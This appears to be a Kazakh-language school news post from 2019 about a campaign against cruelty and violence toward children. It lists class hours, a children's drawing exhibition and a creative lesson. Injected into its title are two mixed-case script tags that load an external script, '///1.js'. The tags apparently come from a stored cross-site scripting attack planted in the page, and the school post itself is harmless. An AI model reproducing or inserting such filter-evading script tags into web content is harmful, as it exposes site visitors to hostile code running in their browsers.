«Балалар үшін бірге»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.11.2019
«Новорыбин орта мектебі-бақшасы» ММ-де дүниежүзілік «бала күні» аясында «Қатыгездік пен зорлық-зомбылықсыз балалық шақ» Республикалық ақпараттық кампаниясы өткізілді. Ақпараттық кампания мектепте «Балалар үшін бірге» ұранымен өтті.
Іс-шараның мақсаты: оқушылардың азаматтық құқықтары мен міндеттері туралы түсініктерін кеңейту. Оқушылар, мұғалімдер және ата-аналар арасында толерантты қарым-қатынасты қалыптастыруға ықпал ету. Науқанды өткізу барысында келесі іс-шаралар жоспарланған және өткізілді:
- «Отбасы – тәрбие басы, Мектеп – тәрбие жаршысы» бірыңғай сынып сағаты өтті;
- 1-4 сынып оқушыларының ортасында «Бақытты балалығым» сурет көрмесі ұйымдастырылды;
- «Мейірімділік әлемді құтқарады», «Балалық шақ қатыгездік пен жассыз» сынып сағаттары өткізілді;
- Балабақшаның тәрбиешілерімен бірге «Мейірімділік ғажайыптар жасайды» шығармашылық сабақ өткізілді.
Просмотров: 1198